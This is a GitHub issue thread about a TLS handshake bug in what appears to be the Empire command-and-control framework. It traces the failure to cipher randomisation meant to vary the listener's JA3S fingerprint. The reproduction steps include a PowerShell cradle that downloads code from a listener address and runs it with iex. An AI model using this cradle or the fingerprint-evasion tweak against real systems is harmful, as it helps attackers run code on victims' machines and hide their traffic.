Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[BUG]Powershell version 2 TLS Handshake failure #155

Closed
tyraniter opened this issue Apr 7, 2020 · 4 comments · Fixed by #163
Closed

[BUG]Powershell version 2 TLS Handshake failure #155

tyraniter opened this issue Apr 7, 2020 · 4 comments · Fixed by #163
Labels
bug Something isn't working confirmed

Comments

@tyraniter
Copy link

Empire Version

  • Empire 3.x

OS Information (Linux flavor, Python version)

  • OS: Ubuntu1804
  • Python: 2.7

Describe the bug
When using powershell client on Windows 7 on which the default version of powershell and dotnet is 2 to connect to a https listener , there will be an "HandShake Failure"
image

To Reproduce
Steps to reproduce the behavior:

  1. Start a https listener
  2. Run script in powershell terminal:

powershell -version 2
$a=new-object net.webclient;
$a.downloadstring('https://192.168.116.1:9999')|iex;

  1. See error
    image

Expected behavior
In default status, windows 7 only supports TLS1.0 and in lib/listeners/http.py,most of the following cipher suite is only supported after TLS1.2.If the random function return a cipher suite which TLS1.0 does not support,"HandShake Failure".

cipherlist = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384","ECDHE-RSA-AES256-SHA", "AES256-SHA256", "AES128-SHA256"]
selectciph = random.choice(cipherlist)
context.set_ciphers(selectciph)

This list is added in #27 for "randomized JA3S signature". The python ssl.set_ciphers function can only be passed a string but not a list as parameter.Maybe we can use TLS1.0 cipher suites only for compatibility?
Screenshots
N/A

Additional context
N/A

@tyraniter tyraniter added the bug Something isn't working label Apr 7, 2020
@tyraniter
Copy link
Author

tyraniter commented Apr 7, 2020

Maybe we can do like this:

cipherlist_1 = random.choice(["ECDHE-ECDSA-AES256-SHA","ECDHE-RSA-AES256-SHA"])
cipherlist_12 = random.choice(["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256"])
context.set_ciphers(cipherlist_1+':'+cipherlist_12)

@Hubbl3
Copy link

Hubbl3 commented Apr 7, 2020

@tyraniter that's a good idea. I will work on fixing this for the next bug fix release or you can submit a PR.

@tyraniter
Copy link
Author

tyraniter commented Apr 9, 2020

@tyraniter that's a good idea. I will work on fixing this for the next bug fix release or you can submit a PR.

I will submit a PR

@Cx01N
Copy link
Member

Cx01N commented Apr 14, 2020

Fix added to v3.1.5

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working confirmed
Projects
None yet
Development

Successfully merging a pull request may close this issue.

3 participants